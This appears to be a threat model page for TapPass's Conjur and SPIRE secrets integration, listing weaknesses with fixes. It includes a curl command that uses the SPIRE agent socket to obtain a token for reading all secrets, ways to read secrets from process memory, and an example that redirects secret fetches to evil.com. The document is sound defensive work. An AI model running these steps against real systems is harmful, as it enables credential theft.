Skip to content

Threat Model

Honest assessment of what’s secure, what’s not, and what to fix.


1. CATCH: Env Var Fallback = Silent Downgrade Attack

Section titled “1. CATCH: Env Var Fallback = Silent Downgrade Attack”

The problem: When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.

# conjur_backend.py line 104-108
env_val = os.environ.get(name)
if env_val is not None:
logger.debug("secret_env_fallback", name=name) # debug level — easy to miss
return env_val

Impact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.

Fix needed: In production, the fallback should be configurable. Fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The debug log level hides this — should be warning at minimum.


2. CATCH: Secrets Live in Process Memory — Unprotected

Section titled “2. CATCH: Secrets Live in Process Memory — Unprotected”

The problem: Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They live in memory until garbage collected — which may be never for cached values.

# conjur_backend.py — cache is a plain dict of plain strings
self._cache: dict[str, tuple[str, float]] = {}
# "sk-ant-api03-..." sits in heap memory, readable via:
# - /proc/PID/mem (root)
# - gcore PID (core dump)
# - ptrace (debugger attach)
# - memory forensics after container kill

Impact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (crash, OOM kill) writes them to disk.

Fix needed:

  • Disable core dumps: ulimit -c 0 or prctl(PR_SET_DUMPABLE, 0) at process start.
  • The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
  • Python cannot truly zero memory (strings are immutable). For the vault encryption key, crypto.py could use mlock() via ctypes to prevent swap, but this is hard in Python.

3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?

Section titled “3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?”

The problem: The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.

# If an attacker gets shell in the same pod or on the same node:
curl --unix-socket /tmp/spire-agent/public/api.sock \
http://localhost/v1/fetch_jwt_svid \
-d '{"audience": ["tappass"]}'
# → Gets a valid JWT-SVID → authenticates to Conjur → reads all secrets

Impact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.

Mitigation (SPIRE’s responsibility, not ours):

  • SPIRE Agent uses kernel attestation (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
  • The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
  • SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.

Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.


The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.

Impact: If the Conjur admin credential is compromised, all secrets are compromised.

Mitigation:

  • Conjur admin should use MFA (CyberArk PAM).
  • Admin API key should be rotated and stored in a break-glass safe.
  • Separation of duty: TapPass’s host/tappass/server identity has read only — it cannot modify policies or read secrets outside its policy scope.

5. CATCH: Resolver Auto-Detection Can Be Manipulated

Section titled “5. CATCH: Resolver Auto-Detection Can Be Manipulated”

The problem: The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.

resolver.py
if os.environ.get("CONJUR_APPLIANCE_URL"):
backend = ConjurBackend() # connects to whatever URL is in the env var

Impact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.

Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.


The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).

Impact: A 5-minute window where a compromised key is still in use, even after rotation.

Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.

Fix needed: Conjur can send webhooks on secret rotation. TapPass should auto-register a webhook listener that calls invalidate() automatically — zero human intervention.


The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.

With mTLS, even if an attacker intercepts the JWT-SVID, they can’t replay it because they don’t have the TLS client certificate.

Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.


LayerStatusWhy
No secrets in code/config/env129 callsites go through protocol. Only Conjur connection coordinates in env (not secrets).
Automatic rotation pickupTTL cache + invalidation endpoint. No restart needed.
Audit trailConjur logs every secret read with host identity, timestamp, result.
No static credential for Conjur authSPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production.
SPIFFE identity reuseSame SPIRE infrastructure for agent auth AND Conjur auth. Single identity system.
Protocol is openBackend is swappable. Conjur today, Vault tomorrow. No lock-in.
TLS to Conjurhttpx verifies server cert. Never verify=False. CA pinning via CONJUR_SSL_CERT_PATH.
Thread safetySingle lock protects cache + auth token. All Conjur I/O serialized.

#IssueSeverityEffortFix
1Env fallback in production is silent downgradeHighSmallAdd CONJUR_FAIL_CLOSED=true mode. Log fallbacks at warning not debug.
2Conjur URL can be redirected via env varHighSmallMandatory CONJUR_SSL_CERT_PATH in production. Validate URL against allowlist.
3Core dumps contain secrets in memoryMediumSmallDisable core dumps at process start. Set RLIMIT_CORE=0.
4No mTLS to ConjurMediumMediumUse X509-SVID as httpx client cert for Conjur connections.
55-min rotation gapLowMediumConjur webhook → auto-invalidate.
6SPIRE socket access = root of trustLow (SPIRE’s job)N/ADocument attestation requirements.
7Memory secrets can’t be zeroed (Python)LowN/ALanguage limitation. TTL cache limits window.